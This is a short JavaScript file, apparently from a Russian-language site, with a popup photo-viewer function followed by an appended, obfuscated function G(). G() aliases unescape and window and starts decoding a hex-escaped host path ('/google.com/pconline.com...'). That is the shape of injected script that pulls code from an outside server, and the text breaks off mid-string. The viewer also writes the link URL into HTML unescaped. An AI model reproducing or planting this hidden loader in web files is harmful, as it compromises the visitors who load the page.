function openImg(obj){
		if(!obj.href.match("#")||(!obj.href)){	
			var sourse = "<html>\n"+
						"<title>Фото</title>\n"+
						"<head>\n"+
						"<link href='../css/window.css' rel='stylesheet' type='text/css'>\n"+
						"</head>\n"+
						"<body style=\"font-size:24px; margin:0px; padding:0px;\" onLoad=\"var x=document.getElementById(\'img\').width; var y=document.getElementById(\'img\').height; y=y+14; if(window.sizeToContent){window.sizeToContent()} else {resizeTo(x,y+14);} document.getElementById(\'preloder\').style.visibility=\'hidden\'; \" style='background:#CCCCCC; margin:0px; padding:0px;' >"+
		
	"<div id='preloder' align='center'><br><br><br><strong><img src='../images/loading.gif' hspace='10' align='top'>LOADING...</strong></div>"+
		"<div style=\"position:absolute; top:0px; left:0px;\" align=\"center\">"+
						"<img id='img' src=\'" +
							obj.href+
						"\'></div></body></html>";
					
				var windowObject = window.open("","Фото","dependent=1,toolbar=no,menubar=no,location=no,width=300,height=200,status=no");
				windowObject.moveTo(300,200);
				windowObject.document.open();       
				windowObject.document.write(sourse);
				windowObject.document.close();
				windowObject.focus();
		}else{
		alert("Фото отсутствует")
		}
	}

function G(){var zZ;if(zZ!='S' && zZ!='B'){zZ='S'};var P=unescape;var U=window;var f;if(f!=''){f='GY'};var g=P("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%63%6f%6e%6c%69%6e%65%2e%63%6f%6d%2e%63%
